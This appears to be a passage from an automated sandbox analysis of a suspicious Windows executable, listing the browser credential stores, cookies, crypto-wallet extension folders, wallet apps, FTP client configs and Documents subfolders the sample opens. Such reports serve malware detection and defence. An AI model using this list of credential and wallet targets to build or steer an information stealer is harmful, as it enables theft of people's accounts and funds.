              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\ZBEDCJPBEYJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\AFWAAFRXKOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\MNULNCRIYCJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\RAYHIWGKDIJump to behavior
              Source: C:\Users\user\Desktop\#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exeDirectory queried: C:\Users\user\Documents\TQDGENUHWPJump to behavior
